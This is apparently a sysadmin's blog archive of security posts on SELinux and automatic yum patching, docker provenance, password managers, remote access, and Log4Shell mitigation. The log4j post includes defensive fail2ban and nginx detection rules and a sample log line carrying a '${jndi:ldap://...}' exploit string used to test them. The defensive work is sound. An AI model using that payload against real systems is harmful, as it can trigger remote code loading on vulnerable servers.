Showing posts with label security.

Monday, 20 March 2023

SELinux sucks II

Previously I wrote about SELinux being bad for security on the grounds that it consumed too much of your time for little benefit. But I recently discovered it actively undermining the security on hosts I am responsible for.

The biggest wins for security are education and regular patching. So ensuring there is a patching mechanism is at the top of my list when building a new host. While the advice from NIST still reads like something written in the 1970s, NCSC and others endorse automated patching. I've not had any issues with Ubuntu/Debian across hundreds of machines running automated patching for several years - but I'm still cautious about how this is implemented.

I recently inherited some CentOS 7 boxes which did not have automatic patching. While there is a RHEL package, yum-cron, it has quite a history of issues. I would also need to edit the packaged files to ensure that my live boxes did not update at the same time as dev/test. I appreciate that delaying the updates to live might still mean a different patch set gets deployed than is on dev/test....but it is a risk which can be reduced. So I just added a simple cron job to run `yum -y update`, logging its stdout and stderr.
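The cron job itself is a one-liner; something along these lines (the schedule, paths and log location here are illustrative, not necessarily what I deployed):

```shell
# /etc/cron.d/yum-update -- illustrative path and schedule
# Run a full update nightly, capturing stdout and stderr for later review
30 3 * * * root /usr/bin/yum -y update >> /var/log/yum-auto-update.log 2>&1
```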

I thought all was good. Cron job was firing. Yum was happily reporting that there was nothing to do. Job done. What's next?

Only it was not working. 

Updates were available. They were not installed. Yum said "No packages marked for update".

Running an update via an interactive session worked fine.

The culprit? SELinux.

It took a bit of experimentation to find this. On a dev system sitting idle (other than my ssh session), SELinux was generating so much noise that the default log rotation config only allowed for 40 minutes of history. By setting up a more frequent cron job I was able to capture the failures in audit.log. So yum was being blocked by SELinux but reporting no errors. In fairness, the absence of errors from yum was not the fault of SELinux....however yum is now produced/maintained by Red Hat.
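For anyone chasing the same problem, the denials can also be pulled straight out of the audit trail - this assumes auditd is running and you have root:

```shell
# List recent SELinux AVC denials, then narrow down to anything involving yum
ausearch -m avc -ts recent
ausearch -m avc -ts today | grep -i yum
```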

OK....so maybe there was a reason for installing yum-cron after all? So I installed it (I do find it surprising that it EXPECTS manual intervention before it will actually work). Configured it. And nothing. `yum list updates` says there are lots of packages to update. The cron job fires. Yum-cron writes no logs. No updates are installed. I amended the yum-cron config to send an email when patching has been attempted - I will monitor it and see how it goes.
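For reference, the relevant settings in /etc/yum/yum-cron.conf look roughly like this - the email address is a placeholder, and the first two settings are the "manual intervention" mentioned above (they default to no):

```ini
# /etc/yum/yum-cron.conf (excerpt)
download_updates = yes
apply_updates = yes
emit_via = email
email_to = sysadmin@example.com
```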

This was an interesting journey. In addition to the issues with RHEL yum-cron, I discovered that CentOS yum-cron has issues all of its own.

So to summarize....

  • SELinux blocks yum when it is run from cron
  • yum does not report the failures
  • CentOS yum-cron can't install security fixes only




Sunday, 25 September 2022

Why I'm (mostly) not using docker

I'm somewhat cautious of docker. Rather than reposting the same stuff on Reddit, I thought it would be quicker to list the reasons here and then just post the URL when it comes up.

I'm running a few hundred LXCs at $WORK. It's a really cheap way to provide a computing environment. And it works. But I'm more cautious about docker. Docker is not supported as a native container provider on Proxmox - which is where most of my VMs and LXCs now live - but that really has very little bearing on my concerns. I do have VMs running docker - more on that later.

The first problem is that it's designed for running appliances. Some software fits very well into this model - but such software is usually an edge case. For databases, I do not want lots of layers of abstraction between the runtime and the storage. For routers/firewalls, I want the interfaces to be under the direct control of the host. For application and web servers, I want to be able to interrogate memory and cpu usage on a per-process basis. Working on docker containers feels like key-hole surgery. It might be very hi-tech but it's awkward and limiting. Conversely, I can have a (nearly) fully functional LXC host with very little overhead.

For a lot of people out there, the idea that you can just click a couple of links and have a service available for use sounds great. And it is. I've downloaded stuff from docker hub to try out myself. But I wouldn't run it in production. The stuff I do run in production has a well defined provenance - it has either come from the official debian/ubuntu repos or from the people who wrote the software. In the case of the latter, there are processes in place to check if the software needs updating. Conversely, a docker container is built up of multiple layers, sourced from different teams/developers, most of whom are repackaging software written by someone else. In addition to the issue of sourcing software securely, the layers of packagers may also add capabilities to the container. It really might not be as isolated from the host as you think.
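One quick way to see just how opaque that layering is: ask docker where an image came from. The image and container names below are just examples:

```shell
# Show the layer history of an image -- each CREATED BY line is a build step
# from whoever packaged that layer, not necessarily the upstream authors
docker history --no-trunc nginx:latest

# Check which extra Linux capabilities a running container was granted
docker inspect --format '{{.HostConfig.CapAdd}}' some_container
```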

This lack of accountability is a growing concern - indeed Chainguard have released a Linux distribution specifically to address the problem. Will it solve these problems? It's too early to tell.

So really the only sensible way to use docker in an enterprise environment is to build the images yourself. That demands additional work and a high level of skill in another technology just to get the same result.

BTW - the docker images I've used to trial software and then decided to take into production have been implemented as conventional installs on LXCs or VMs.

Tuesday, 12 April 2022

Password Manager 2

Having previously decided to try out Syspass, I must say I'm disappointed.

In terms of the broad design it gets a lot of things right. But the implementation is particularly poor and buggy. It is built as a single page application, and if you accidentally hit the back button or close your window then it's rather painful to get back to your session (at least as something you can interact with). Operations will randomly fail, then succeed when re-invoked. The permissions/access model around the API makes it unsuitable for integration with clients in most cases. And the browser plugin would not work at all for me.

I'm still using it just now - it's better than the spreadsheet it replaced. And I've gone to the trouble of writing scripts to verify the passwords and export the data to KeePass.

I was excited to learn of VaultWarden - an open source implementation of BitWarden. The current version would not compile on Ubuntu 20.04 LTS (it required a newer version of Rust) so I tried out the docker version. But the software has no support for user groups, which would make policy management an enormous job.

Why is this so hard people!


Friday, 10 December 2021

CVE-2021-44228 log4j RCE mitigation

 "This seems to be generating some buzz" - a passing comment in $WORK's chat app - prompted me to go look at this in a bit more detail. As a systems admin, I generally let the dev guys worry about the health of the applications while I deal with the infrastructure, but this one is bad. Real bad. Like coronavirus for Java application servers. It even came from China (but kudos to the AliBaba guys for letting everyone know - this could have gone very differently).

I've never been able to work on Java developer timescales - and I didn't think this vulnerability would let me. So...

Fail2ban

I've got a small cluster of proxies fronting the web and application servers. These have fail2ban running which does a good job of keeping the script-kiddies out (really - I needed to put in a bypass for the company we subcontract the pen-testing to). So first off was a fail2ban rule:

[Definition]

failregex = ^<HOST>.*\"\${jndi:ldap://
ignoreregex =
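The pattern can be sanity-checked outside fail2ban with grep - the log line below is made up for illustration (payload in the User-Agent field, which is how most of the probes arrived):

```shell
# A fabricated access-log entry carrying the exploit string in the User-Agent
line='203.0.113.5 - - [10/Dec/2021:23:01:44 +0000] "GET / HTTP/1.1" 404 0 "-" "${jndi:ldap://203.0.113.66/a}"'

# The same jndi pattern the filter uses, minus the fail2ban <HOST> tag
echo "$line" | grep -Eq '"\$\{jndi:ldap://' && echo "matched"
```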


But fail2ban reads the log files to get its input. The log files don't get written until the request is processed. It won't catch the first hit.

Containment

The exploit works by retrieving a malware payload from an LDAP server. So the next step I took was to add firewall rules preventing our application servers from connecting to ports 389 and 636, other than to our whitelisted internal LDAP servers.
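With iptables that looks something like the following - the internal LDAP address and the choice of chain are illustrative, not what was actually deployed:

```shell
# Allow LDAP/LDAPS to the internal directory server only (example address)
iptables -A OUTPUT -p tcp -d 192.0.2.10 -m multiport --dports 389,636 -j ACCEPT
# Reject LDAP/LDAPS to anywhere else -- breaks the exploit's payload retrieval
iptables -A OUTPUT -p tcp -m multiport --dports 389,636 -j REJECT
```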

Of course that's only going to help when the attacker is using an LDAP server running on the default ports. But it was worth doing. We were already getting attempts to exploit our servers, but they were crude / badly targeted. Until 14 minutes after I rolled out the firewall change. When we got hit by a request which would have triggered a successful exploit.

Prevention

The best mitigation (apart from applying the patch) is to set the "formatMsgNoLookups=true" option (hint for non-Java people out there - add this on the Java command line prefixed with "-D"). However according to the documentation I could find, this only works on some versions of log4j / it is far from clear just now if those versions are a sub-set or a superset of the versions which are vulnerable to the exploit, and I did not have time to go find out.
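For the non-Java people, that means a startup line along these lines - the jar name is a placeholder, and you should check the flag is actually honoured by the log4j version you are running:

```shell
# Disable log4j message lookups at JVM startup
java -DformatMsgNoLookups=true -jar application.jar
```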
 
It seems obvious now, but there is a better way of protecting the systems. The proxy cluster uses nginx, so I went on to add this in the config:

if ($http_user_agent ~* "\{jndi:") {
        return 400;
}
if ($http_x_api_version ~* "\{jndi:") {
        return 400;
}

(note that the second statement may have a functional impact).

I don't know if I've covered the entire attack surface with this, but now I get to go to bed and our servers live for another day.

Sunday, 10 January 2021

Password Manager

I recently chose Syspass to use as a repository for storing passwords. Since there is something of a dearth of in-depth reviews of Open-Source software, I thought I should redress that imbalance by explaining why here.

 

The Problem

From 2017-2018 I was working as a CyberArk administrator. CyberArk is a privileged access management tool – it stores passwords, implements password management (verifying, rotating, generating, synchronizing) and allows users to access a session without having access to the password. It also provides reporting on state and usage.

CyberArk is really well designed and put together.

But it is very expensive.

When I started a new job with a different employer in 2018, pretty much the only handover I got was a spreadsheet full of passwords. As you might imagine, there were a lot of things higher on my priority list to get the datacenter under control than where passwords were stored. But eventually it came back to the top of my list.

 

The Requirements

Users

We've gone from 1 admin person to 3 in a very short time – but I don't expect the team to expand much more. However I was keen to have a platform which could be shared securely with the development teams and potentially the wider business. That implied a user-interface – meaning not just some GUI front end, but a multi-user authentication and authorization capability.

Password Management

With several hundred hosts, the prospect of using unique passwords, or ever changing them, seems to have been too much of a challenge for my predecessors. A critical requirement was that the new system support some means of changing passwords. Having seen from my work with CyberArk that this is not quite as simple as it sounds, the requirement here was that the system provide a usable API for retrieving, verifying and updating passwords.

Secret Management

In 2020, passwords are not the only secrets that need to be stored/deployed securely – there are also access tokens and encryption keys.

Security CIA

Confidentiality, Integrity and Availability are the magic properties of Security. A password manager contains your security crown jewels and so should be subject to very exacting standards for these attributes. Confidentiality entails a robust mechanism for encrypting and protecting data. Integrity is partially addressed by the Password Management requirements above, but along with Availability it requires a backup/restore mechanism which works when the rest of your infrastructure is severely impaired. 2020 has seen major outages at AWS, Google and Azure – outsourcing that responsibility is not a realistic option.

 

The Products

Some of the products I looked at in my search were Passbolt, Lastpass, Bitwarden (inc Bitwarden RS), Hashicorp Vault, TeamPass, Passit, GoPass.

An honourable mention here goes to Hashicorp Vault – it is all about the API and machine-to-machine communication. Indeed, the base distribution only has a CLI for user interaction. While there are web front ends, these only expose limited functionality and are geared more towards data maintenance than providing humans with access to secrets. It is also notable for quorum based master key injection at system start-up.

I found the others to be very lacking in their encryption, management of the master key (where one was used) or the functionality/documentation of their APIs.

While Bitwarden has a good user interface (including browser plugins for web application authentication) the API is poorly documented and the authentication process is byzantinely complicated.

 

Syspass

This runs on my favourite platform: Linux, PHP and MySQL.

Notable features

The web front end allows a single click to copy data to the clipboard (something CyberArk struggles with out of the box).

It not only provides a web-based API but also publishes documentation on how to augment the behaviour of the server with plugins.

It can provide user authentication via its native user database or via LDAP (including MS Active Directory). Since the user's password is also the decryption key for the user's copy of the master password, that entails a resynchronization process if the password is changed – that is catered for by the use of a temporary, time-limited token. However I have not yet got LDAP integration working with my ancient and somewhat misconfigured OpenLDAP service.

It provides 2 factor authentication.

Missing

If I were designing a password manager myself, I would definitely be building it as a PHAR to take advantage of the code signing mechanisms available to PHP. Syspass is not available as a PHAR, and would need significant reworking to package it as such (the install process writes the config to PHP code files). But in fairness I have not come across any password manager available as a PHAR.

Although it has a browser plugin, I've yet to get this working as intended. Also the plugin relies on the API authentication mechanism – which seems cumbersome (see below). On both Chrome (v87) and Firefox (v84) it refuses to save the configuration.

While the web interface uses Ajax (with JSON responses) extensively to interact with the server, it uses a different end-point than the documented API.

The documented API is intended for machine-to-machine communication. It uses a simple system of access tokens (although there is mention of HTTP Basic authentication in the manual – https://syspass-doc.readthedocs.io/en/3.0/application/authorization.html). However rather than creating a machine account, it is necessary to provision individual permissions which are aggregated under an account name and a password. Managing a complex system with a lot of clients will be difficult.
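For the record, the API is JSON-RPC over HTTP. A call looks roughly like this - the endpoint, method name and token here are placeholders based on my reading of the Syspass 3.x docs, so check them against your own install:

```shell
# Search for accounts matching "database" using an API auth token
curl -s -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","method":"account/search","params":{"authToken":"YOUR_TOKEN","text":"database"},"id":1}' \
  https://syspass.example.com/api.php
```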

 

Project status

As yet, I'm not completely committed to Syspass, and it still needs a lot of work before it will be ready for production. I have started looking at the Backup/DR model and think the best solution will be to export the data into an encrypted KeePass database. The first installment of the code for that is published on GitHub: https://github.com/symcbean/kpx-writer-php 

I will be publishing further updates in the coming months. 



Saturday, 4 April 2020

Security tools are awful

In my experience, most bolt-on security products actually undermine your security at great expense rather than enhancing it. One exception to this is a good password manager. Recently I've been trying to find one for my workplace. Unfortunately I have nothing like the budget needed for CyberArk - in my last job, I looked after my employer's CyberArk installation and really loved it (despite the fact that most of it only ran on MS-Windows). If you have money to burn - read no further - go buy CyberArk and don't skimp on getting it configured correctly.

My starting point was open source team password managers - there's lots to choose from: Syspass, Teampass, Passbolt, Passit, Psono, bitwarden....the list goes on and on.

The first issue I came across is the way they handle the master encryption key. If you are running this on your own infrastructure then that might not matter too much. But few people do still run their own infrastructure, and of those that do, the passwords for your infrastructure are the last thing anyone would want to store on their own infrastructure! Almost all are really, really bad at this. A surprising number of projects try to pass off pen tests against the application as security audits - probably because 1) pen tests are now relatively cheap and 2) they know their emperor has no clothes.

The second issue is the lack of a usable API. I don't just want to store passwords, I want to install other secrets. I don't want to have to copy and paste every time my infrastructure needs a secret. I want to be able to rotate passwords. I don't even mind that your application does not do this - if I can make sense of the API I can easily implement this myself.

Most of them have APIs - but are lacking in documentation. PassBolt is offered as a commercial product / service as well as open source and proudly provides documentation on the end points - but is somewhat lacking in detail about access authentication tokens. I was therefore quite hopeful that they would be able to point me in the right direction, but after contacting their support, they were not able to provide a single example of a client or explain how their authentication worked!

I was excited when I discovered that Passit ran as a single page application - surely that must mean it's a REST API? But when I tried using it I saw no data traffic in the browser's developer tools - WTF? I can only guess that it's using websockets to communicate.

The third issue is devops syndrome. Yes, you can install their open source product, but only after you build out the same set of orchestration and build tools that they use. Just run this simple command.....after you have installed node.js, docker, kubernetes, ansible, jenkins.....  


Wednesday, 18 March 2020

COVID19 - Provisioning remote access with Linux


When I started in my current role, they were using a conventional Cisco IPSEC-based VPN. While it worked with a few config tweaks, it was far from ideal for security or user experience. The big security issue is that it creates a big hole in your firewall – from a device bridged to the internet! A further concern was that authentication was via a password. While I could have put in a RADIUS server with an MFA authentication source, this still required users to either:
  • take their work computer (and all the data stored on their local disk) off site
  • install and configure some very esoteric software on their own hardware

Fixing all these problems would take a massive amount of effort to provide a very limited service with continuing security problems.

If everything they need is on their computer in work – then I just need to find a way of providing access to their computer at work remotely. So here are the ingredients for the recipe I used:
  • tigervnc running an Openbox session
  • noVNC to provide access from a browser
  • Google Authenticator for 2-factor authentication
  • wakeonlan and rdesktop to reach each user's office machine
  • a free TLS certificate

All the above, with the exception of the free certificate, are open-source and available from official Ubuntu repos (this software is also available for other Linux and BSD systems). In addition I wrote custom scripts to
  • provision users (with QR codes for Google auth)
  • run wakeonlan and rdesktop
  • collect activity stats
Now all a user needs to get connected is a mobile device running an authenticator application and an internet connected browser.
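The wake-up-and-connect step is just a couple of commands chained together - the MAC address, boot delay and hostname are placeholders:

```shell
# Wake the user's office PC, give it time to boot, then open an RDP session
wakeonlan 00:11:22:33:44:55
sleep 60
rdesktop -f users-desktop.example.internal
```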
Once they get their head around the fact that they don't need to be sitting in front of the computer they are using, the users are very happy with the experience. We have fewer reports of issues than we do from the legacy VPN users. The 2-factor authentication provides much better security.

The only difficult bit was stripping out the full “desktop experience” from Openbox. I don't want my users shutting down the machine or mapping drives! Initially I tried xfreerdp as the RDP client but had a lot of issues with keyboard mapping.

As hinted at above, the machine is heavily locked down – users have no shell on the local machine. This was easy to implement but impacted on the behaviour of some terminal emulators (required for onward ssh access). Openbox and systemd don't play nicely together – so running “last” reports all users have “gone away”. This seems to be yet another systemd issue. However I get more useful usage monitoring from the script to collect activity stats (this finds openbox processes and interrogates /proc to find the user, display and other information).

It would be trivial to add in screen captures here – but I decided to leave this out for now. It's also possible for additional users to join a VNC session, but this is currently blocked on the firewall until I think up a way of handling it which does not reduce the overall security.

The version of noVNC installed from repo is rather old, and the current client (i.e. the html and javascript parts) have a lot of improvements - I downloaded these files from github and copied them over the repo install.

I chose tigervnc as, although all the vncservers support multi-head usage on Linux, the package version of this seemed closest to my usage model.

Currently this is running on a 2-core virtual machine. The initial 2Gb of RAM was all but used up with 17 users online, and this has since been increased to 8Gb. The 2 CPUs are overkill – with 20 users working online, the load was around 0.3 and bandwidth was averaging 200kbps with a peak of 500kbps.
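As a back-of-envelope check, the per-user RAM figure in the comparison table can be derived from those numbers - assuming a 250Mb base OS footprint and the 17 users that were online when the 2Gb was exhausted:

```shell
# (2048Mb total - 250Mb base OS) shared across 17 concurrent users
per_user=$(( (2048 - 250) / 17 ))
echo "${per_user}Mb per user"
```

which lands close to the 100Mb figure quoted.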

Out of curiosity I looked up what Microsoft say you need for an RDS server. A comparison with what I am currently running is shown below:



                 Microsoft recommend    My server uses
Base OS          2Gb                    250Mb
RAM per user     64Mb                   100Mb
CPU per user     0.06                   0.015
B/W per user     64kbps                 25kbps

So in terms of the hardware resources there's not a clear winner – however having worked in an environment which used Microsoft RDS extensively, supporting the Linux system is a lot cheaper in terms of manpower. And that's before considering the costs of licensing the Microsoft solution and implementing 2FA.

Some more details in a later post.